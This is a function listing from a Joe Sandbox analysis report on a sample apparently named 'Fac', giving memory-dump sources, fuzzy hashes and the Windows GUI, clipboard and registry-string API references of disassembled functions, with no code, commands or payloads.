Instruction ID: 8441fc0891489585df2b7a5b021d416ab8a24ce5e5e2ba07ee2f5f5c9210fdcd
Opcode Fuzzy Hash: 21633fd1b09fecf2767c1aa8a51be1258aa9adfc5fbdfb7c1e687397d5d169f5
Instruction Fuzzy Hash: B1C1A178E01218CFDB54DFA5C940B9DBBB2BF89300F2081A9D409AB365DB359E86CF55

Function 36FB8BA0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8a47bf21a538fe942d10a74e720b97ca06fc69a040b185e32f195e1f88eeae0
Instruction ID: 232ee35173003ee1365adf6b6bd086c16e4c5ee47f23be89b875cc802026d549
Opcode Fuzzy Hash: d8a47bf21a538fe942d10a74e720b97ca06fc69a040b185e32f195e1f88eeae0
Instruction Fuzzy Hash: FBC1B178E01218CFDB54DFA5C940B9DBBB2BF89300F6081A9D409AB365DB359E82CF55

Function 36FB0498 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16a1d099ffccc55461efd260509fa2daf473979868d8c50f0b8fa40913981aa6
Instruction ID: 0a5e6762e750d57363db6ed5d168eeb446be85bda0b859615ef058a4fd7e35c1
Opcode Fuzzy Hash: 16a1d099ffccc55461efd260509fa2daf473979868d8c50f0b8fa40913981aa6
Instruction Fuzzy Hash: 61C1A178E01218CFDB54DFA5C940B9DBBB2BF89300F2081A9D409AB365DB359E81CF55

Function 36FB7E98 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e71a54a5c00e162d64fbcdca585872ee745b0ee2ad91e23a44316e9a84787a9
Instruction ID: 9e68c59db8ff5cc179dd4f6641dc1218baea98f259aea5b17141f533c0784925
Opcode Fuzzy Hash: 6e71a54a5c00e162d64fbcdca585872ee745b0ee2ad91e23a44316e9a84787a9
Instruction Fuzzy Hash: E1C1B178E01218CFDB54DFA5C940B9DBBB2BF89300F2081A9D809AB365DB359E85CF55

Function 36FB7190 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc246d5b322c295a2dca7081d42a110ac65a906a26b8325f59d452392c0a5df1
Instruction ID: dc62f27aa309369020c2010662a4a60906e9f2f72e7f200bf3aec2804947a492
Opcode Fuzzy Hash: dc246d5b322c295a2dca7081d42a110ac65a906a26b8325f59d452392c0a5df1
Instruction Fuzzy Hash: F3C1B178E01218CFDB54DFA5C944B9DBBB2BF89300F2081A9D409AB365DB359E82CF55

Function 36FBA290 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 338a9b80f183e9613a3832c70d3f487312094286c0c886504ba81f1518f0ec87
Instruction ID: a9665c83b4dd2500f1b53c1a63a751a4695236f1797a33b8834fc7aab76b3870
Opcode Fuzzy Hash: 338a9b80f183e9613a3832c70d3f487312094286c0c886504ba81f1518f0ec87
Instruction Fuzzy Hash: E8C1AF78E01218CFDB54DFA5C940B9DBBB2FB89300F2081A9D409AB365DB359E86CF55

Function 36FB9588 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d8cb6a9f384870d192a4062ab249633ddf2387ea77964eb3244f45966f2adcb
Instruction ID: cb75f0106524056322e7f47f3fb76cdb6bc41be675a7984eef10fb9532a01282
Opcode Fuzzy Hash: 8d8cb6a9f384870d192a4062ab249633ddf2387ea77964eb3244f45966f2adcb
Instruction Fuzzy Hash: 50C1A178E01218CFDB54DFA5C940B9DBBB2BF89300F6081A9D409AB365DB359E81CF55

Function 36FB5B78 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f59b653c456093ad5716901b4faddc72bb1b8b7c6620624c2a37684622291178
Instruction ID: bde3c8c74a3e21a21be48a57ef9be9249a7a2bf51a6a16fa2da90ccd9073e539
Opcode Fuzzy Hash: f59b653c456093ad5716901b4faddc72bb1b8b7c6620624c2a37684622291178
Instruction Fuzzy Hash: 58C1B378E01218CFDB54DFA5C940BADBBB2BF89300F6081A9D409AB365DB355E81CF55

Function 36FB4E70 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25dad7b3fce6caa40e96a9baaa20ae3ee668fe6dbad5a58f45a78214f2cf939f
Instruction ID: 47099641b56861b0c9c3288240663430a126138b421df4dafe1c81dcd2c4be84
Opcode Fuzzy Hash: 25dad7b3fce6caa40e96a9baaa20ae3ee668fe6dbad5a58f45a78214f2cf939f
Instruction Fuzzy Hash: C4C1B278E01218CFDB54DFA5C940B9DBBB2BF89300F2081A9D409AB365DB359E81CF51

Function 36FB4168 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18527bb98d0f8607b105722221ec9743687f0d070b8958c3d6ed7c70c9430c33
Instruction ID: afccb77c7e62eeb36477de6f742cc2f02b232de589bcfecc5d40578ff0377a06
Opcode Fuzzy Hash: 18527bb98d0f8607b105722221ec9743687f0d070b8958c3d6ed7c70c9430c33
Instruction Fuzzy Hash: DCC1B178E01218CFDB54DFA5C940B9DBBB2BF89300F2081A9D408AB365DB359E86CF55

Function 36FB3460 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6340bcf5b9be90a5b5e3c5653aa02e1895a24479378d8f0625076bf61779c582
Instruction ID: 10e89fb61726413f1df4e146219a86d1faae1563d96546c2a69f2c4a4082c677
Opcode Fuzzy Hash: 6340bcf5b9be90a5b5e3c5653aa02e1895a24479378d8f0625076bf61779c582
Instruction Fuzzy Hash: A6C1B079E01218CFDB54DFA5C940B9DBBB2BF89300F2081A9D409AB365DB359E82CF55

Function 36FB2758 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b07681f487356528831fb4edf19e92715e177891a6fc1b47a32e59767eb5ab1
Instruction ID: c345e7af169ff21f0bd262498ef97b533bac0412307ca9325e975e30606f2b98
Opcode Fuzzy Hash: 1b07681f487356528831fb4edf19e92715e177891a6fc1b47a32e59767eb5ab1
Instruction Fuzzy Hash: F2C1B278E01218CFDB54DFA5C940BADBBB2BF89300F2081A9D408AB365DB359E81CF55

Function 36FB1A50 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f8a3d2dc8a633b6e066f88f30919213c4869a582e8f8fa4f869583ac175950a
Instruction ID: 2fcbddf724975308788b57323568e0ee0302ae2ae42c1babf36bb112c2a6ad7e
Opcode Fuzzy Hash: 0f8a3d2dc8a633b6e066f88f30919213c4869a582e8f8fa4f869583ac175950a
Instruction Fuzzy Hash: 3EC1A178E01218CFDB54DFA5C940B9DBBB2BF89300F2081A9D409AB365DB359E85CF55

Function 36FB0D48 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b75759039b24cd4a3eaa2453b386366947b6a93ed58dfcbf321dfe58c39affef
Instruction ID: e72e370f8f7cc079f2b52ca76a3c5e448792108c8b79536db71179d1772b4942
Opcode Fuzzy Hash: b75759039b24cd4a3eaa2453b386366947b6a93ed58dfcbf321dfe58c39affef
Instruction Fuzzy Hash: 7CC1B178E01218CFDB54DFA5C940B9DBBB2BF89300F2081A9D409AB3A5DB359E85CF55

Function 36FB8748 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19370923b321f2b03083b25d04d8463fd139172eff42a930a98a50b242a91d3c
Instruction ID: af4cc289eb4bc172df0cc301bdc8e5495662aaeffac0babf2bf0f9b31ed3255a
Opcode Fuzzy Hash: 19370923b321f2b03083b25d04d8463fd139172eff42a930a98a50b242a91d3c
Instruction Fuzzy Hash: BFC1B178E01218CFDB54DFA5C940B9DBBB2BF89300F2081A9D419AB365DB359E81CF51

Function 36FB0040 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ced845d0bf425b73467dd0f9597f5ef45630d81a73d1437b522374e42f0cb90a
Instruction ID: 1ef3679d0217f7f11c9b871483aeb71154ae7e376198cbf490e5de41147e9b0d
Opcode Fuzzy Hash: ced845d0bf425b73467dd0f9597f5ef45630d81a73d1437b522374e42f0cb90a
Instruction Fuzzy Hash: 6EC1B178E01218CFDB54DFA5C940B9DBBB2BF89304F2081A9D409AB365DB359E85CF51

Function 36FB7A40 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78c057e02d2be83c87725a0438d5c3cff06ecb4d4378f05ba2d38874b87d99d3
Instruction ID: d260ba93512dc3fcab9292ed01075bee0b4af0e5d8de5577cd8247dcb4179bb4
Opcode Fuzzy Hash: 78c057e02d2be83c87725a0438d5c3cff06ecb4d4378f05ba2d38874b87d99d3
Instruction Fuzzy Hash: 9FC1A178E01218CFDB54DFA5C944B9DBBB2BF89300F2081A9D409AB365DB359E85CF51

Function 36FB9E38 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b512f0e379778d0d58d6234bfd96862e4a0bb5dffb764700fc91512d8d6a470
Instruction ID: 4cf95997e2f2f6338a975ac826cdb131f0e95ad00313e78604156a90f0e39af5
Opcode Fuzzy Hash: 7b512f0e379778d0d58d6234bfd96862e4a0bb5dffb764700fc91512d8d6a470
Instruction Fuzzy Hash: F9C1A078E01218CFDB54DFA5C940B9DBBB2BF89300F2081A9D808AB365DB359E85CF51

Function 36FB5720 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49ddbfc615f8e5720e23172a09103d36ca9b8046d1211c10ac7db5e9f42a0ea8
Instruction ID: 153a6665ce58e5f85997b3cb71d22ee6fe648f2a447bc0f10d3e24d93ff9c1e4
Opcode Fuzzy Hash: 49ddbfc615f8e5720e23172a09103d36ca9b8046d1211c10ac7db5e9f42a0ea8
Instruction Fuzzy Hash: 5CC1B378E01218CFDB54DFA5C940BADBBB2BF89300F6081A9D408AB365DB359E85CF51

Function 36FB4A18 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3414f74806ffb015ba2d077169ca4974f0c1c03123b3d836a5aa876a74e7e50c
Instruction ID: a396f982007282600f3f2da40f259a2123b628f9c17cc6de140ff4213e0cd08f
Opcode Fuzzy Hash: 3414f74806ffb015ba2d077169ca4974f0c1c03123b3d836a5aa876a74e7e50c
Instruction Fuzzy Hash: 85C1B278E01218CFDB54DFA5C940B9DBBB2BF89300F2081A9D409AB365DB359E85CF55

Function 36FB3D10 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85278fb32966e0108f7c68c770eb187d661cc6fc4899d6fb9dda10af3b7ea2db
Instruction ID: c75fcbfc77be825bfad46bfb9afba5be941cca6556cddbd6b7f96b443aed450f
Opcode Fuzzy Hash: 85278fb32966e0108f7c68c770eb187d661cc6fc4899d6fb9dda10af3b7ea2db
Instruction Fuzzy Hash: F2C1A078E01218CFDB54DFA5C940B9DBBB2BF89300F2081A9D409AB365DB359E85CF55

Function 36FB3008 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85bfae195d9bc0d9b39eff40b2a9bea09b07ab2784cf546034067d5467b61aba
Instruction ID: d9b7c4fde76ac2fccc0d4a42bea5048b3b7f058fc6c915ddb061713401311d85
Opcode Fuzzy Hash: 85bfae195d9bc0d9b39eff40b2a9bea09b07ab2784cf546034067d5467b61aba
Instruction Fuzzy Hash: 2DC1B179E01218CFDB54DFA5C940B9DBBB2BF89300F6081A9D408AB365DB359E81CF51

Function 37043E61 Relevance: .3, Instructions: 253COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43481111190.0000000037040000.00000040.00000800.00020000.00000000.sdmp, Offset: 37040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37040000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e0fa0d7c497139b9a1967ed654004c8325a6329075ff97911bfaf0cbf45aad8
Instruction ID: 7f33b00baa08eedac739a20792a791bc5aaef00f1486f9f27995410929f50d5d
Opcode Fuzzy Hash: 0e0fa0d7c497139b9a1967ed654004c8325a6329075ff97911bfaf0cbf45aad8
Instruction Fuzzy Hash: 61912575905608CFEB14AFA0D8587EEBBB1FB4A303F50542AD1017B2E1CB784A49CF95

Function 37043E70 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43481111190.0000000037040000.00000040.00000800.00020000.00000000.sdmp, Offset: 37040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37040000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75c33b4b62eaac47edb62b9aea493ca0e1ee259ed6eaccbf895c2ea846ded44f
Instruction ID: 564081ec15af522cb2d037ff94c8a4b8074e847c14184b89cefa5d279859066d
Opcode Fuzzy Hash: 75c33b4b62eaac47edb62b9aea493ca0e1ee259ed6eaccbf895c2ea846ded44f
Instruction Fuzzy Hash: 58911775901618CFEB14AFA0D8587EEBBB1FB4A303F50542AD501772E1CB784A49CF99

Function 37040A10 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43481111190.0000000037040000.00000040.00000800.00020000.00000000.sdmp, Offset: 37040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37040000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1d3deb6ec3e7ac330d8e0f24c923cc2d7d8edc59ffd73a796e34c92ad354542
Instruction ID: fb95be20d6577934c74a80ddf2b82f0f5e6e1dd35f3f23feed254977cd4123af
Opcode Fuzzy Hash: c1d3deb6ec3e7ac330d8e0f24c923cc2d7d8edc59ffd73a796e34c92ad354542
Instruction Fuzzy Hash: 70B18774E00218CFDB54DFA9C994A9DBBB2FF89314F1081A9D819AB365DB30A942CF50

Function 37040A00 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43481111190.0000000037040000.00000040.00000800.00020000.00000000.sdmp, Offset: 37040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37040000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd8e27469085a70f989e0d159379d776f10668569dde96b15358489aaf0b974d
Instruction ID: 2c51cf7744b2611423099a4bd77604021b28abe6dd76855fe50003bc9231ea1b
Opcode Fuzzy Hash: dd8e27469085a70f989e0d159379d776f10668569dde96b15358489aaf0b974d
Instruction Fuzzy Hash: 05519674E01608CFDB18CFAAC984A9DBBF2BF89300F148169D419BB365D7309946CF54

Function 0040542B Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 00405489
GetDlgItem.USER32(?,000003EE), ref: 00405498
GetClientRect.USER32(?,?), ref: 004054D5
GetSystemMetrics.USER32(00000002), ref: 004054DC
SendMessageW.USER32(?,00001061,00000000,?), ref: 004054FD
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040550E
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405521
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040552F
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405542
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405564
ShowWindow.USER32(?,00000008), ref: 00405578
GetDlgItem.USER32(?,000003EC), ref: 00405599
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055A9
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055C2
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055CE
GetDlgItem.USER32(?,000003F8), ref: 004054A7

Part of subcall function 00404230: SendMessageW.USER32(00000028,?,00000001,0040405B), ref: 0040423E

GetDlgItem.USER32(?,000003EC), ref: 004055EB
CreateThread.KERNEL32(00000000,00000000,Function_000053BF,00000000), ref: 004055F9
CloseHandle.KERNEL32(00000000), ref: 00405600
ShowWindow.USER32(00000000), ref: 00405624
ShowWindow.USER32(?,00000008), ref: 00405629
ShowWindow.USER32(00000008), ref: 00405673
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056A7
CreatePopupMenu.USER32 ref: 004056B8
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056CC
GetWindowRect.USER32(?,?), ref: 004056EC
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405705
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040573D
OpenClipboard.USER32(00000000), ref: 0040574D
EmptyClipboard.USER32 ref: 00405753
GlobalAlloc.KERNEL32(00000042,00000000), ref: 0040575F
GlobalLock.KERNEL32(00000000), ref: 00405769
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040577D
GlobalUnlock.KERNEL32(00000000), ref: 0040579D
SetClipboardData.USER32(0000000D,00000000), ref: 004057A8
CloseClipboard.USER32 ref: 004057AE

Strings

6B, xrefs: 00405719
{, xrefs: 00405691

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {$6B
API String ID: 590372296-3705917127
Opcode ID: 07dce959fb3b4bd7827401e85aa695c337e7b33fdf51fd828ae6b4d9bc2b0272
Instruction ID: 3049cebfab52017954bd75dac417762e958ea911a39284ee9670f095a09d9852
Opcode Fuzzy Hash: 07dce959fb3b4bd7827401e85aa695c337e7b33fdf51fd828ae6b4d9bc2b0272
Instruction Fuzzy Hash: BAB13970900609FFEF119FA1DD89AAE7B79EB04354F40403AFA45AA1A0CB754E52DF68

Function 00403D22 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D5E
ShowWindow.USER32(?), ref: 00403D7B
DestroyWindow.USER32 ref: 00403D8F
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DAB
GetDlgItem.USER32(?,?), ref: 00403DCC
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DE0
IsWindowEnabled.USER32(00000000), ref: 00403DE7
GetDlgItem.USER32(?,00000001), ref: 00403E95
GetDlgItem.USER32(?,00000002), ref: 00403E9F
SetClassLongW.USER32(?,000000F2,?), ref: 00403EB9
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F0A
GetDlgItem.USER32(?,00000003), ref: 00403FB0
ShowWindow.USER32(00000000,?), ref: 00403FD1
EnableWindow.USER32(?,?), ref: 00403FE3
EnableWindow.USER32(?,?), ref: 00403FFE
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404014
EnableMenuItem.USER32(00000000), ref: 0040401B
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404033
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404046
lstrlenW.KERNEL32(004236E8,?,004236E8,00000000), ref: 00404070
SetWindowTextW.USER32(?,004236E8), ref: 00404084
ShowWindow.USER32(?,0000000A), ref: 004041B8

Strings

6B, xrefs: 00404060

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID: 6B
API String ID: 184305955-4127139157
Opcode ID: f6ed39352ab810f3bf29cb5980913c4ff4fbf893e6a2b56c3deeb3d9b08c0738
Instruction ID: 82b316f52afb12e79a093577f28ca1d9a17c40f64bf266079eac87a4e965ab64
Opcode Fuzzy Hash: f6ed39352ab810f3bf29cb5980913c4ff4fbf893e6a2b56c3deeb3d9b08c0738
Instruction Fuzzy Hash: 89C1C071600201ABDB316F61ED88E2B3A78FB95746F40063EF641B51F0CB395992DB2D

Function 00403974 Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B

lstrcatW.KERNEL32(00437000,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,00437800,77293420,00435000,00000000), ref: 004039F5
lstrlenW.KERNEL32(004281A0,?,?,?,004281A0,00000000,00435800,00437000,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000,00000002,00437800), ref: 00403A75
lstrcmpiW.KERNEL32(00428198,.exe,004281A0,?,?,?,004281A0,00000000,00435800,00437000,004236E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004236E8,00000000), ref: 00403A88
GetFileAttributesW.KERNEL32(004281A0), ref: 00403A93
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403ADC

Part of subcall function 004061CB: wsprintfW.USER32 ref: 004061D8

RegisterClassW.USER32(004291A0), ref: 00403B19
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B31
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B66
ShowWindow.USER32(00000005,00000000), ref: 00403B9C
GetClassInfoW.USER32(00000000,RichEdit20W,004291A0), ref: 00403BC8
GetClassInfoW.USER32(00000000,RichEdit,004291A0), ref: 00403BD5
RegisterClassW.USER32(004291A0), ref: 00403BDE
DialogBoxParamW.USER32(?,00000000,00403D22,00000000), ref: 00403BFD

Strings

.DEFAULT\Control Panel\International, xrefs: 004039E0
_Nb, xrefs: 00403AF8, 00403B60
RichEdit20W, xrefs: 00403BC0, 00403BC6
RichEd32, xrefs: 00403BB0
Control Panel\Desktop\ResourceLocale, xrefs: 004039A8
.exe, xrefs: 00403A82
6B, xrefs: 004039A0
RichEd20, xrefs: 00403BA2
RichEdit, xrefs: 00403BCF

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$6B
API String ID: 1975747703-949986762
